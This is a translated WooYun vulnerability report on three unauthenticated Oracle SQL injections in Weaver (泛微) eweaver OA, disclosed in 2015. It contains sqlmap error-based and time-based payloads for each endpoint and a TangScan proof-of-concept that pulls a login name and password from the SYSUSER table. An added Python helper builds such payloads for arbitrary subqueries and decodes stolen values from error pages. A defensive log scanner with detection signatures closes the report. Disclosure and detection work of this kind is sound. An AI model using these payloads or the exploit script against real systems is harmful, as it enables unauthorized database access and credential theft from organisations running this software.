
Vulnerability summary

Defect ID: wooyun-2015-0140003

Title: Three SQL injections in the 泛微OA (Weaver OA) common system, bundled (reproducible on the vendor's own site, no login required)

Vendor: 泛微OA (Weaver)

Author: 浮萍

Submitted: 2015-09-12 16:24

Fix deadline: 2015-12-13 23:06

Published: 2015-12-13 23:06

Type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-12: details sent to the vendor, awaiting vendor handling
2015-09-14: vendor confirmed; details visible to the vendor only
2015-09-17: details opened to third-party security partners (NSFOCUS 唐朝安全巡航)
2015-11-08: details opened to core white hats and domain experts
2015-11-18: details opened to regular white hats
2015-11-28: details opened to intern white hats
2015-12-13: details made public

Brief description:

Going through the files one by one is too much work.
Three injection points.
The vendor's own site is used as the example.

Detailed description:

Injection point 1:
Vulnerable file: /mobile/plugin/loadWfGraph.jsp
http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1*
(the trailing * is sqlmap's injection-point marker; the injectable parameter is requestid)

[Screenshot: Snap114.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 3708=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(113)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (3708=3708) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(122)||CHR(111)||CHR(113)||CHR(62))) FROM DUAL) AND 'IhpV'='IhpV

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 5058=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(121)||CHR(68)||CHR(104),5) AND 'IXww'='IXww
---
[16:30:43] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


Databases (sqlmap --dbs):

available databases [37]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EWEAVER
[*] EWEAVER5TEST
[*] EWEAVERINHOUSE
[*] EWEAVERTEST
[*] EXFSYS
[*] FTOA01
[*] FTPOM
[*] HR
[*] HTF
[*] IX
[*] MDSYS
[*] MOBILEDEMO
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PMECOLOGY
[*] POWER
[*] POWER01
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEAVERIM
[*] WFPM
[*] WMSYS
[*] XDB
[*] ZTDBA
[*] ZTKG
[*] ZZB
[*] ZZBMIS3


Injection point 2:
http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1
(the injectable parameter is nodeid, as the sqlmap payloads below show)

[Screenshot: Snap115.jpg]


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 109 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1' AND 2569=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(101)||CHR(116)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (2569=2569) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(119)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'noSD'='noSD

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1' AND 6418=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(72)||CHR(65)||CHR(108),5) AND 'mcMO'='mcMO
---


Injection point 3:
http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2*
(the trailing * is sqlmap's injection-point marker; the injectable parameter is id)

[Screenshot: Snap116.jpg]


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 53 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2' AND 9830=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(100)||CHR(97)||CHR(104)||CHR(113)||(SELECT (CASE WHEN (9830=9830) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(111)||CHR(109)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'ByUc'='ByUc

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2' AND 3045=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(82)||CHR(119)||CHR(114),5) AND 'dOdb'='dOdb
---
[16:37:44] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
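All six sqlmap payloads above are instances of two templates: the error-based one makes Oracle parse an invalid XML QName built from a delimiter, the value to be read, and the delimiter again, so that the ORA-31011 / LPX-00110 error text echoes the value back; the time-based one blocks on DBMS_PIPE.RECEIVE_MESSAGE for a fixed number of seconds. The following Python 3 helper is an added example, not part of the original report or of the TangScan project: it builds both payloads around an arbitrary single-row subquery and decodes the value back out of the error page. The delimiter qaflq and the quq/qsq/qoq escape tokens are the ones the PoC script in the proof section uses; the sample error pages, the tag numbers 9945/5058 and the 'zz'='zz closing clause are constructed for this example.

```python
import re

# Delimiter the PoC uses around the value it reads back; sqlmap picks a random one per run.
MARKER = "qaflq"

# Characters that are illegal inside an XML QName are swapped for short tokens server-side
# (nested REPLACE calls) and restored client-side.  Same table as the PoC: note that the
# original maps both space and '@' to 'quq', so '@' cannot be told apart from a space.
_ESCAPES = [(" ", "quq"), ("$", "qsq"), ("@", "quq"), ("#", "qoq")]


def chr_concat(text):
    """Render TEXT as CHR(n)||CHR(n)||... so the payload contains no string literals."""
    return "||".join("CHR(%d)" % ord(c) for c in text)


def build_error_payload(inner_select, marker=MARKER, tag=9945):
    """Wrap INNER_SELECT (one VARCHAR row) in sqlmap's Oracle XMLType error-based template.

    Oracle tries to parse '<:' + marker + value + marker + '>' as XML, fails with
    ORA-31011 / LPX-00110 "invalid QName" and echoes the offending QName, i.e. the
    delimited value, in the error message the JSP page returns to the client.
    The leading quote closes the application's own string literal; the trailing
    'zz'='zz (constructed here, random in sqlmap) balances the quotes again.
    """
    wrapped = "(%s)" % inner_select
    for ch, tok in _ESCAPES:
        wrapped = "REPLACE(%s,CHR(%d),%s)" % (wrapped, ord(ch), chr_concat(tok))
    m = chr_concat(marker)
    return ("' AND %d=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||%s||(%s)||%s||CHR(62))) "
            "FROM DUAL) AND 'zz'='zz" % (tag, m, wrapped, m))


def build_time_payload(seconds=5, tag=5058):
    """sqlmap's Oracle time-based check: RECEIVE_MESSAGE on a pipe nobody writes to blocks
    for SECONDS, but only if the left-hand side of the AND is actually evaluated."""
    return "' AND %d=DBMS_PIPE.RECEIVE_MESSAGE(%s,%d) AND 'zz'='zz" % (tag, chr_concat("uyDh"), seconds)


def _between_markers(body, marker):
    m = re.search(re.escape(marker) + r"(.+?)" + re.escape(marker), body, re.S)
    return m.group(1) if m else None


def decode_error_response(body, marker=MARKER):
    """Pull the delimited value out of an ORA error page and undo the escape tokens."""
    raw = _between_markers(body, marker)
    if raw is None:
        return None
    for ch, tok in _ESCAPES:
        raw = raw.replace(tok, ch)
    return raw


def extract_credentials(body, marker=MARKER):
    """The PoC's exploit() concatenates LONGONNAME||'quq'||LOGONPASS, so the first 'quq'
    separates the two fields.  A space inside either field collides with the separator;
    that is a limitation of the PoC's encoding, not something the client can repair."""
    raw = _between_markers(body, marker)
    if raw is None:
        return None
    user, sep, password = raw.partition("quq")
    return (user, password) if sep else None


def time_based_confirmed(baseline_seconds, delayed_seconds, delay=5):
    """Treat a DBMS_PIPE delay as confirmed only when the timed request overshoots the
    baseline by most of the requested delay; one slow response on its own proves nothing."""
    return delayed_seconds - baseline_seconds >= 0.8 * delay


# Constructed responses; a real page wraps the ORA text in whatever the JSP error handler emits.
SAMPLE_VERSION_PAGE = (
    "java.sql.SQLException: ORA-31011: XML parsing failed\n"
    "ORA-19202: Error occurred in XML processing\n"
    'LPX-00110: Warning: invalid QName ":qaflqOraclequqDatabasequq11gquqEnterprisequqEdition'
    'quqReleasequq11.2.0.1.0quq-quq64bitquqProductionqaflq" (not a Name)\n'
)
SAMPLE_CREDENTIAL_PAGE = 'LPX-00110: Warning: invalid QName ":qaflqsysadminquqS3cret123qaflq" (not a Name)'

if __name__ == "__main__":
    print(build_error_payload("SELECT NVL(CAST(Banner AS VARCHAR(4000)),CHR(32)) FROM v$version WHERE rownum = 1"))
    print(build_time_payload())
    print(decode_error_response(SAMPLE_VERSION_PAGE))
    print(extract_credentials(SAMPLE_CREDENTIAL_PAGE))
```

The only application-specific part of each payload is the parameter it is appended to (requestid, nodeid or id); the template itself is identical across the three endpoints, which is why the report's sqlmap runs all converge on the same two techniques.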


Proof of concept:

Verifying them one at a time is too slow, so a TangScan script is used here.

#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2013-2014 TangScan developers (http://**.**.**.**/)
See the file 'docs/COPYING' for copying permission
author: 浮萍 <fate0@**.**.**.**>
"""
import re
from thirdparty import requests
from modules.exploit import TSExploit

__all__ = ['TangScan']


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "泛微eweaver系统SQL注入检测1",
            "product": "weaver",
            "product_version": "",
            "desc": "",
            "license": self.license.TS,
            "author": "浮萍",
            "ref": [
                {self.ref.wooyun: "**.**.**.**"},
            ],
            "type": self.type.injection,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": "",
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "target url"
            }
        })
        self.register_result({
            "status": False,
            "data": {
                "user_info": {
                    "username": "",
                    "password": ""
                },
                "db_info": {
                    "version": "",
                }
            },
            "description": "",
            "error": ""
        })

    def verify(self):
        self.print_debug("verify start")
        # The extracted value comes back delimited by 'qaflq'
        # (CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113) in the payload).
        re_version_pattern = re.compile(r'qaflq(.+?)qaflq', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        # Error-based (XMLType) payload reading the v$version banner.  Spaces, '$', '@' and '#'
        # are swapped for quq/qsq/quq/qoq server-side so they survive inside the XML QName.
        # Note: unlike the exploit() payload and the sqlmap payloads above, this one has no
        # closing CHR(62) ('>') before the final ')) FROM DUAL)'.
        exp_url = ("{domain}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 9945=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(Banner AS VARCHAR(4000)),CHR(32)) FROM v$version WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113))) FROM DUAL) AND 'jsWv'='jsWv".format(domain=self.option.url))
        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return
        re_result = re_version_pattern.findall(response.content)

        if len(re_result) == 0:
            self.result.status = False
            return
        self.result.status = True

        ls_result = re_result[0]
        ls_result = ls_result.replace('quq', ' ')   # undo the space substitution
        self.result.data.db_info.version = ls_result
        self.result.description = "target {url} is SQL-injectable; database version: {db_version}".format(
            url=self.option.url,
            db_version=ls_result
        )

    def exploit(self):
        self.print_debug("exploit start")
        # Username and password come back joined by 'quq' (see the payload below).
        re_userinfo_pattern = re.compile(r'qaflq(\w+?)quq(\w+?)qaflq', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        # Reads LONGONNAME||'quq'||LOGONPASS from the first row of SYSUSER.
        exp_url = ("{domain}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 2341=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(concat(LONGONNAME||CHR(113)||CHR(117)||CHR(113),LOGONPASS) AS VARCHAR(4000)),CHR(32)) FROM SYSUSER WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'tJNI'='tJNI".format(domain=self.option.url))
        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return
        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return
        self.result.status = True
        self.result.data.user_info.username = re_result[0][0]
        self.result.data.user_info.password = re_result[0][1]
        self.result.description = "target {url} is SQL-injectable; one user: {username}, password: {password}".format(
            url=self.option.url,
            username=self.result.data.user_info.username,
            password=self.result.data.user_info.password
        )


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())


Points 2 and 3 are handled the same way; only exp_url needs to change.

Case 1
http://**.**.**.**

[Screenshot: Snap117.jpg]

[Screenshot: Snap118.jpg]

Case 2
http://**.**.**.**/

[Screenshot: Snap119.jpg]

Case 3
http://**.**.**.**

[Screenshot: Snap120.jpg]

The PoC may have a problem: it errors when retrieving the username and password.

http://**.**.**.**//mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1'  AND 2341=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(concat(LONGONNAME||CHR(113)||CHR(117)||CHR(113),LOGONPASS) AS VARCHAR(4000)),CHR(32)) FROM SYSUSER WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'tJNI'='tJNI#


[Screenshot: Snap122.jpg]

Ignore the garbled characters.
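For defenders, the three URIs and the parameter sqlmap flagged at each of them are enough to write a log check. The Python 3 scanner below is an added example, not from the report or from Weaver: it walks combined-format access-log lines, looks only at the three vulnerable paths, and labels each flagged parameter with the technique its value carries. The log lines are constructed for the example, and the rule that requestid, nodeid and id should be purely numeric is my assumption (the report only ever shows small integers for them).

```python
import re
from urllib.parse import parse_qsl

# Paths and the parameter sqlmap flagged at each one, taken from the report.  Every value the
# report shows for these parameters is a small integer, so anything non-numeric is treated as
# suspicious even when no known payload signature matches (assumption for this example).
WATCHED = {
    "/mobile/plugin/loadWfGraph.jsp": {"requestid"},
    "/ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction": {"nodeid"},
    "/ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction": {"id"},
}

# Most specific first; a value is labelled with the first signature that matches.
SIGNATURES = [
    ("oracle-error-based-xmltype", re.compile(r"XMLType\s*\(", re.I)),
    ("oracle-time-based-dbms_pipe", re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I)),
    ("boolean-tautology", re.compile(r"'\s*AND\s+\d+\s*=", re.I)),
]

# Apache/nginx combined log format; only the fields needed below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


def inspect_request(target):
    """Return (path, param, technique) findings for one request target (path?query)."""
    # Split by hand: urlsplit() would read the report's doubled leading slash as a host.
    path, _, query = target.partition("?")
    path = re.sub(r"/{2,}", "/", path)
    params = WATCHED.get(path)
    if not params:
        return []
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in params:
            continue
        label = next((lbl for lbl, rx in SIGNATURES if rx.search(value)), None)
        if label is None and not value.isdigit():
            label = "non-numeric-id"
        if label:
            findings.append((path, name, label))
    return findings


def scan_log(lines):
    """Run inspect_request over every parseable log line and collect alerts in order."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for path, name, label in inspect_request(m.group("target")):
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
                           "param": name, "technique": label, "status": m.group("status")})
    return alerts


# Constructed log lines: two benign requests, sqlmap-style probes of points 1 and 2, and a
# hand-typed quote-breaking attempt against point 3 that no signature covers.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Sep/2015:16:30:43 +0800] "GET /mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Sep/2015:16:30:44 +0800] "GET /mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1%27%20AND%205058%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(117)%7C%7CCHR(121),5)%20AND%20%27IXww%27%3D%27IXww HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev"',
    '203.0.113.5 - - [12/Sep/2015:16:35:01 +0800] "GET //ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1%27%20AND%202569%3D(SELECT%20UPPER(XMLType(CHR(60)))%20FROM%20DUAL)%20AND%20%27noSD%27%3D%27noSD HTTP/1.1" 500 2048 "-" "sqlmap/1.0-dev"',
    '198.51.100.7 - - [12/Sep/2015:16:36:10 +0800] "GET /ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Sep/2015:16:36:12 +0800] "GET /ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 900 "-" "curl/7.43"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The numeric allowlist is what catches the last line: signature lists only recognise what sqlmap emitted for this report, whereas a type check on a parameter that is only ever an ID flags any quote-breaking attempt, including the ones the report's author never ran. The 500 on the XMLType line is also worth correlating, since that technique relies on the error page being returned to the client.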

Fix recommendation:

Copyright notice: when reposting, credit the source, 浮萍@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-09-14 23:05

Vendor reply:

CNVD has confirmed the reported issue and has notified the software vendor through the handling channels established previously.

Latest status:

None yet